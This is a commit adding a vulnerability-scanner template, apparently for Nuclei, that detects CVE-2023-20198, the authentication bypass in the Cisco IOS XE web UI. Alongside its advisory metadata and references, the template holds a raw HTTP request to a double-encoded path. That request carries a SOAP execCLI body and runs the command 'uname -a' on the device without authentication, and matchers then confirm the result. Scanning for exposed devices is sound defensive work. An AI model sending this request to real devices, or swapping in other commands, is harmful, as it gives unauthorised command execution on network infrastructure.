Added CVE-2023-20198 (Cisco IOS XE - Authentication Bypass) (#8507)

* Added CVE-2023-20198 (Cisco IOS XE - Authentication Bypass)

* Update CVE-2023-20198.yaml

http/cves/2023/CVE-2023-20198.yaml

@@ -0,0 +1,64 @@
+id: CVE-2023-20198
+
+info:
+  name: Cisco IOS XE - Authentication Bypass
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.
+    For steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory.
+    Cisco will provide updates on the status of this investigation and when a software patch is available.
+  reference:
+    - https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/
+    - https://arstechnica.com/security/2023/10/actively-exploited-cisco-0-day-with-maximum-10-severity-gives-full-network-control/
+    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z
+    - https://www.cisa.gov/guidance-addressing-cisco-ios-xe-web-ui-vulnerabilities
+    - https://www.darkreading.com/vulnerabilities-threats/critical-unpatched-cisco-zero-day-bug-active-exploit
+  impact: |
+    The CVE-2023-20198 vulnerability has a high impact on the system, allowing remote attackers to execute arbitrary code or cause a denial of service.
+  remediation: |
+    Apply the latest security patches or updates provided by the vendor to fix the CVE-2023-20198 vulnerability.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
+    cve-id: CVE-2023-20198
+    epss-score: 0.02284
+    epss-percentile: 0.88438
+    cpe: cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: cisco
+    product: ios_xe
+    shodan-query: http.html_hash:1076109428
+    note: this template confirms vulnerable host with limited unauthenticated command execution, this does not include admin user creation + arbitrary cmd execution.
+  tags: cve,cve2023,kev,cisco,rce,auth-bypass
+
+variables:
+  cmd: uname -a
+
+http:
+  - raw:
+      - |-
+        POST /%2577eb%2575i_%2577sma_Http HTTP/1.1
+        Host: {{Hostname}}
+
+        <?xml version="1.0"?> <SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <SOAP:Header> <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext"> <wsse:UsernameToken SOAP:mustUnderstand="false"> <wsse:Username>admin</wsse:Username><wsse:Password>*****</wsse:Password></wsse:UsernameToken></wsse:Security></SOAP:Header><SOAP:Body><request correlator="exec1" xmlns="urn:cisco:wsma-exec"> <execCLI xsd="false"><cmd>{{cmd}}</cmd><dialogue><expect></expect><reply></reply></dialogue></execCLI></request></SOAP:Body></SOAP:Envelope>
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - XMLSchema
+          - execLog
+          - Cisco Systems
+          - <text>
+          - <received>
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - <text>\n(.*)\[